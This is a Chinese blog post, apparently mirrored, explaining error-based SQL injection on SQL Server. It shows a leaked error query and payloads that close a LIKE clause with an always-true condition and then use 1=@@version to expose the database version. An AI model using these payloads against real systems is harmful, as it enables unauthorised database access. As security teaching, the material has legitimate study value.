zoukankan      html  css  js  c++  java

  • 利用永真条件来实现sql注入方法

    Q:遇到报错的sql注入,怎么办?

    1、首先,先把部分语句给copy下来:

    SELECT @Total=COUNT(1) FROM (select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%') T SELECT * FROM ( SELECT ROW_NUMBER() OVER (ORDER BY FProcStatus ASC,FCreationDate DESC) AS RowNumber,* FROM ( select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%' ) AS N ) AS A WHERE A.RowNumber BETWEEN 1 AND 8 at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) at System.Data.SqlClient.SqlDataReader.TryConsumeMetaData() at System.Data.SqlClient.SqlDataReader.get_MetaData() at System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) at 。。。。。。(后面很有很长的sql语句)

    2、面对复杂的语句,如何下手? 可以把上面的语句简化,容易分析

    SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B'%')  。。。。。。(后面还有很多就不管了)

    好了,下面开始研究如何注入。

    利用永真条件来实现sql注入方法:
    (如果不使用永真条件进行判断的话,使用 ' and 1=@@version+-- 那么很复杂的语句的话,会破坏掉整个sql语句的逻辑,导致执行sql查询失败,最终也无法得到版本)

    1、如果遇到很复杂的语句怎么办? 那么我们就把复杂的语句简化为下面这条语句,以免乱军心:
    SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B%')

    2、插入语句: %' and 1=1 and '%'=' 可以让语句拼接正常,而不会报错
    SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=1 and '%'='%')

    3、开始搞事情:把 1=1 改为 1=@@version 就会把“真”变成“假”,那么数据库将会报错,就会爆出数据库版本
    SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=@@version and '%'='%')
  • 相关阅读:
    Java字符集
    ==和equals区别
    web.xml中load-on-startup标签的含义
    使用solrJ管理索引——(十四)
    Solr管理索引库——(十三)
    [置顶] 关于redhat系统yum源的配置1
    设置Oracle用IP远程连接和客户端访问
    jqueryUI中datepicker的使用,解决与asp.net中的UpdatePanel联合使用时的失效问题
    [置顶] 关于redhat系统yum源的配置2
    浅析innodb_support_xa与innodb_flush_log_at_trx_commit
  • 原文地址:https://www.cnblogs.com/relax1949/p/14069837.html
Copyright © 2011-2022 走看看